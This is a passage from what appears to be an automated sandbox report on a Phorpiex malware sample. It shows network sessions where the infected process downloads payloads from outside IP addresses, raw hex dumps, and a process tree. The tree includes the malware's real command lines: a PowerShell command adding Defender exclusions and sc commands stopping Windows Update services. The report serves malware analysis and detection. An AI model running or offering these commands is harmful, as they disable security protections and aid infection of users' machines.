                                                                                                                                                                                            Oct 26, 2024 07:28:15.799351931 CEST112INData Raw: 55 fa f6 a6 80 b6 6c 83 d2 ea 2f d6 f9 a2 96 d2 ee 32 1d 3a 03 4f 21 69 97 4b 76 be d4 fd 5e 94 dc b6 91 f9 89 7f 6c da 9f c8 b4 c1 a7 bb 31 3d 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d
                                                                                                                                                                                            Data Ascii: Ul/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]Q
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799370050 CEST1236INData Raw: a6 0d 4c 3e e9 bd ed af 75 87 f1 d2 86 41 08 5a bd 13 a6 84 8a c2 e5 17 da 20 0e 5a 82 b2 0a f8 76 61 c8 22 fc 8f a0 c5 48 da d8 eb 12 49 88 b8 19 a0 62 4b b2 a5 64 50 ba 53 02 1a 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89
                                                                                                                                                                                            Data Ascii: L>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfg
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799397945 CEST1236INData Raw: e0 e8 5d ff 13 54 77 b3 5a a1 57 39 5e f2 c4 9d 68 78 8c e3 b8 19 81 f4 98 60 60 5c ce 07 ca 91 76 6b 55 0e 99 a1 87 f3 02 01 bc f9 26 cb 93 f5 cc e3 07 b9 b2 ba e1 6c 83 b1 4a b6 f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6
                                                                                                                                                                                            Data Ascii: ]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'
                                                                                                                                                                                            Oct 26, 2024 07:28:15.804799080 CEST1236INData Raw: c8 39 87 a9 06 af 54 df ae 08 4d 84 68 5a 90 a9 1f 4e 3c 5e ee 27 ac 6c 7d 49 34 88 6e 86 99 b6 2f 28 55 0e d1 df 87 c8 ba e5 8e b1 da cf 95 de 04 2a b9 53 a7 c2 51 a9 30 45 bf 47 c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20
                                                                                                                                                                                            Data Ascii: 9TMhZN<^'l}I4n/(U*SQ0EGuKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            25192.168.2.650025185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:18.270478964 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210041046 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:19 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 13568
                                                                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67179628-3500"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210283041 CEST112INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                            Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210302114 CEST1236INData Raw: 9d ff ac 13 26 cb c9 21 3e dc d3 64 1f d4 fb 4b 2a 40 8a 9e 69 9c d7 88 b8 5b ba c3 f7 ae fa 88 5d de c1 ac aa e1 e0 7f f9 4c 06 c4 b9 fd f1 eb f2 cd ac 0e 84 7a 41 29 30 a1 85 dc 4e 24 80 77 81 7c 09 6e c7 f7 3d c9 cb d6 be 92 8b ff d2 c8 cc 02
                                                                                                                                                                                            Data Ascii: &!>dK*@i[]LzA)0N$w|n=29-BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210366011 CEST1236INData Raw: 6e 13 33 1e c3 06 07 53 0b e8 41 8d 1f 42 91 8b 82 43 9f 77 81 4a 94 9c 76 1a e8 31 9f b1 e0 73 3e 70 96 a2 ea 73 c5 8b 66 f8 79 fb 7f 98 cd d3 46 4f 43 d6 fa 08 48 69 5f 52 f5 37 ae 12 d5 96 02 02 f0 47 80 8e 4c a4 e5 c7 2e 97 a7 c8 40 e5 5d ee
                                                                                                                                                                                            Data Ascii: n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s']@-:N=rMvVyI7:%MZ}a OaYrPQ;|<5c0aFh){
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210385084 CEST1236INData Raw: 10 ed 29 9e 49 cc d6 c2 1b b7 a4 91 44 a7 e6 56 12 05 30 8f f2 5d d9 97 44 fb fe cb f5 9a 98 09 8c 5e 62 42 e8 56 db 7f 7d bc 12 5d 00 49 af ea e1 9b 1b 16 26 09 d2 73 9c dc 9e 73 f2 fb fd d2 64 77 9d b0 be db 2e 24 95 df c9 fb d1 f2 6e d2 65 c4
                                                                                                                                                                                            Data Ascii: )IDV0]D^bBV}]I&ssdw.$ne1UM?tIC(`mCy`OG*Kz8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpT
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210405111 CEST1236INData Raw: 80 02 a6 34 02 a7 6f b1 a4 1d 0c a0 b3 13 e9 58 d7 d8 22 e3 1a 9f 6a a0 29 a3 68 61 2d d4 f5 4e c3 ff ac ef 37 7b a1 15 8a fb 68 ce 0c 7c db 73 ce f1 5b 95 58 21 b6 88 9b 60 7e 76 11 91 99 1a 7a 24 ed 36 c4 c4 62 31 e0 1c 11 0e 85 6f 02 71 55 58
                                                                                                                                                                                            Data Ascii: 4oX"j)ha-N7{h|s[X!`~vz$6b1oqUXH10>&{gJ.pSmw2X}g|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210424900 CEST1236INData Raw: 94 5c e9 f7 1b d9 bc a0 61 c7 a7 ea 81 0b 7b 9e bd 20 09 19 0f b2 a3 12 ca 6b df 60 d4 c3 e5 ff 53 4a 8f 99 50 c8 7f e5 0e 85 73 3b cc 72 33 61 c0 78 86 c0 a8 49 ac 06 07 58 1c 43 2f 51 55 53 c2 e9 89 22 ff 13 e0 6d c7 64 8e 61 1b 2a f6 b5 c0 24
                                                                                                                                                                                            Data Ascii: \a{ k`SJPs;r3axIXC/QUS"mda*$n&E%@HUNX `C@HuWn+6%c(&rSV){;{F5XSzX~PWo&N#Gx*n)'.d*syf~F
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211889982 CEST1236INData Raw: d5 62 8a c7 e2 27 13 1b f4 45 c4 b7 69 93 0c cd cd ca 3e 15 79 5a b9 08 6c 35 d0 65 ff 7b 60 48 35 4a 53 8d 52 84 1a f0 d7 80 ca fe 61 d0 ef c7 f4 2a 08 c1 ac 6a 2b 25 bd d0 fa 14 b8 7b 77 e3 b2 b7 40 c9 60 0d 34 8a 82 8c 1f f0 51 39 b7 fb d8 6f
                                                                                                                                                                                            Data Ascii: b'Ei>yZl5e{`H5JSRa*j+%{w@`4Q9o@sHt4'C<*GKD>(vhM@XXU"sE"R.YS?KsZXc'Yjd\ZRf|K>YfaZ7^7BXhH`
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211910009 CEST1236INData Raw: 29 c2 da 25 9a 5f 4a f9 e4 49 c9 6f d8 87 ec b4 0f a3 bb 43 5f 5e bb 2a b0 88 20 16 05 4c 5d c4 43 10 91 5c 4e f8 9e 83 99 5c ab 98 b7 9e e5 d1 70 c0 1d a5 b2 2b bd f9 6c c3 4a c9 9c 68 1e fa 40 13 67 45 1b 54 69 95 1b 1a 1e 74 4c ec 84 16 3f b5
                                                                                                                                                                                            Data Ascii: )%_JIoC_^* L]C\N\p+lJh@gETitL?.q>UKx!GCAyIl&m1`pr?;;Y:`Q{szy(>E< "k^`V)f|),X@lI!\=IL86isF>["S$
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211930037 CEST784INData Raw: 8d 7d 01 bd bc 9b b9 d3 a3 53 64 c8 ed 3a 26 61 cd 5c d6 e3 5a 12 96 e9 b2 c4 8f 37 1c 61 7f 16 d0 a4 86 22 20 27 04 a1 df be e3 01 f5 29 5c 08 e1 7b 2a 05 16 82 05 77 ed c2 63 62 08 3c 7a d0 6f 10 c9 73 7a e1 e8 de 85 7c 54 4c 86 55 17 ea 1e 07
                                                                                                                                                                                            Data Ascii: }Sd:&a\Z7a" ')\{*wcb<zosz|TLU"bF<h1'</;u#|>h,TlF][5^B <'1N|h/hHQdY!:'&1lU;7f=AGw:K6Y9?:}..c$Y
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218785048 CEST1236INData Raw: 8e 4c 80 2a ce 4b b1 a9 bf 51 f3 ea ba ed d4 41 22 af ff 21 b5 d5 c6 96 e8 f0 31 a9 23 e8 0d 38 24 4a 70 01 c7 88 5c 60 69 96 d8 c1 51 2a 92 cb a8 42 2e 25 25 68 d2 fe db 5c 44 50 09 ef 2d e1 cc 0a 55 d2 5c b5 1b 27 92 9c bb ad 19 21 1e 38 2f 66
                                                                                                                                                                                            Data Ascii: L*KQA"!1#8$Jp\`iQ*B.%%h\DP-U\'!8/fL!cq@|?$Q6!4/C&UyH@qkb42YIo 5>W6B*5EYC6USz"8B#Zsuw=mtcC/AM3B0Tf~SW


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            26192.168.2.65002791.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:22.408170938 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:23.377285004 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:23 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:01:26:18
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\Desktop\Us051y7j25.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Us051y7j25.exe"
                                                                                                                                                                                            Imagebase:0x140000
                                                                                                                                                                                            File size:10'240 bytes
                                                                                                                                                                                            MD5 hash:82894CAEB7E149BB38D344FBC2A821D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:01:26:27
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\21324.scr
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\21324.scr" /S
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:85'504 bytes
                                                                                                                                                                                            MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000003.2367229368.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\21324.scr, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 82%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:01:26:29
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:85'504 bytes
                                                                                                                                                                                            MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 82%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:sc stop UsoSvc
                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:01:26:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                            Imagebase:0x830000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                            Start time:01:26:33
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:sc stop WaaSMedicSvc
                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:01:26:33
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:sc stop wuauserv
                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:01:26:33
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:sc stop DoSvc
                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:01:26:33
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:sc stop BITS /wait
                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:01:26:40
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:85'504 bytes
                                                                                                                                                                                            MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1881231804.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\1881231804.exe
                                                                                                                                                                                            Imagebase:0x7ff7934f0000
                                                                                                                                                                                            File size:8'704 bytes
                                                                                                                                                                                            MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
